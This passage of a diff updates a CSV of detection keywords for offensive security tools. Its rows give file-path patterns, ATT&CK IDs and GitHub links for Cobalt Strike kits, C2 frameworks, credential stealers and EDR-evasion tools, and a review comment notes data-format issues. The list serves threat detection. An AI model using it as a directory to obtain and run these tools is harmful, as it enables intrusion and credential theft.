T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik 
Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","10","10","448","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*/StayKit.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","10","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*/Staykit/StayKit.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - 
T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","10","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" "*/stinger_client.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*/striker.c","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","279","43","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" "*/Striker.git*","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - 
T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","279","43","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" 
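Review bot: The re-emitted `*/stagers/*.ps1*` row (EmpireProject/Empire) still ends its `metadata_groups_name` field with a dangling separator, `... Indrik Spider - Turla - `, so a consumer that splits the field on ` - ` gets an empty trailing group name. Since this commit rewrites the row anyway for the star count, the field could end `- Indrik Spider - Turla"`; the unchanged `*/stagers/CSharpPS*` context row below it has the same tail. The two Empire rows also disagree on their last technique ID (`T1066` here, `T1157` on the context row), and both appear to be retired ATT&CK IDs, so detections or dashboards keyed on them may not map to a current technique; worth confirming against the current matrix.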
@@ -5489,41 +5549,41 @@ "*/stun-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/stun-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/stuxnet-detect.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/subdomain.yaml*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","10","4712","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" -"*/subdomains.txt*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","984","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" +"*/subdomain.yaml*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive 
Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","10","4716","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" +"*/subdomains.txt*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","985","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" "*/subdomains-10000.txt*","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*/Suborner.git*","offensive_tool_keyword","Suborner","The Invisible Account Forger - A simple program to create a Windows account you will only know about ","T1098 - T1175 - T1033","TA0007 - TA0008 - TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/Suborner","1","1","N/A","N/A","5","452","58","2022-09-02T09:04:46Z","2022-04-26T00:12:58Z" -"*/sudo_tracer.c*","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","0","N/A","7","7","688","113","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z" -"*/sudomy.api*","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","1","N/A","N/A","10","1718","352","2023-09-19T08:38:55Z","2019-07-26T10:26:34Z" +"*/sudo_tracer.c*","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - 
TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","0","N/A","7","7","688","114","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z" +"*/sudomy.api*","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","1","N/A","N/A","10","1720","352","2023-09-19T08:38:55Z","2019-07-26T10:26:34Z" "*/sullo/nikto*","offensive_tool_keyword","nikto","Nikto web scanner tool","T1210.001 - T1190 - T1046 - T1222","TA0007 - TA0002 - TA0001","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7136","1096","2023-09-18T14:44:28Z","2012-11-24T04:24:29Z" "*/sunlogin_rce*","offensive_tool_keyword","POC","SunloginClient RCE vulnerable version","T1587","TA0001 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Mr-xn/sunlogin_rce","1","1","N/A","N/A","5","462","201","2022-02-16T16:11:42Z","2022-02-16T14:20:41Z" "*/Sup3r-Us3r/scripts/*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://raw.githubusercontent.com/Sup3r-Us3r/scripts/master/fb-brute.pl","1","1","N/A","7","10","N/A","N/A","N/A","N/A" "*/supermicro-ipmi-conf.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/Supernova.exe*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","1","N/A","10","4","337","49","2023-09-28T20:56:28Z","2023-08-08T11:30:34Z" -"*/Supernova.git*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","1","N/A","10","4","337","49","2023-09-28T20:56:28Z","2023-08-08T11:30:34Z" -"*/SuperProfileDLL*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/Supershell.tar.gz*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","837","111","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" -"*/supershell/login/auth*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","837","111","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" -"*/Supershell/releases*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. 
By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","837","111","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" -"*/suspendresume.x64*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/suspendresume.x86*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - 
T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Supernova.exe*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","1","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z" +"*/Supernova.git*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","1","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z" +"*/SuperProfileDLL*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/Supershell.tar.gz*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"*/supershell/login/auth*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"*/Supershell/releases*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. 
By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"*/suspendresume.x64*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/suspendresume.x86*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - 
T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" "*/svn-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/SweetPotato_CS*","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","1","N/A","10","10","236","49","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z" "*/Synergy-httpx.git*","offensive_tool_keyword","Synergy-httpx","A Python http(s) server designed to assist in red teaming activities such as receiving intercepted data via POST requests and serving content dynamically","T1021.002 - T1105 - T1090","TA0002 - TA0011 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/t3l3machus/Synergy-httpx","1","1","N/A","8","2","108","14","2023-09-09T10:38:38Z","2023-06-02T10:06:41Z" -"*/syscalls/syscalls_windows.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*/syscalls/syswhispers/*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*/syscalls/syswhispersv2*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" 
+"*/syscalls/syscalls_windows.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*/syscalls/syswhispers/*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*/syscalls/syswhispersv2*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" "*/SyscallsInject/*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - 
TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*/SysmonQuiet*","offensive_tool_keyword","sysmonquiet","RDLL for Cobalt Strike beacon to silence Sysmon process","T1055 - T1055.012 - T1063","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ScriptIdiot/SysmonQuiet","1","1","N/A","N/A","1","81","15","2022-09-09T12:28:15Z","2022-07-11T14:17:34Z" "*/SysWhispers2*","offensive_tool_keyword","SysWhispers3","SysWhispers on Steroids - AV/EDR evasion via direct system calls.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/klezVirus/SysWhispers3","1","1","N/A","N/A","10","1006","148","2023-03-22T19:23:21Z","2022-03-07T18:56:21Z" "*/SysWhispers3*","offensive_tool_keyword","SysWhispers3","SysWhispers on Steroids - AV/EDR evasion via direct system calls.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/klezVirus/SysWhispers3","1","1","N/A","N/A","10","1006","148","2023-03-22T19:23:21Z","2022-03-07T18:56:21Z" "*/SysWhispers3.git*","offensive_tool_keyword","SysWhispers3","SysWhispers on Steroids - AV/EDR evasion via direct system calls.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense 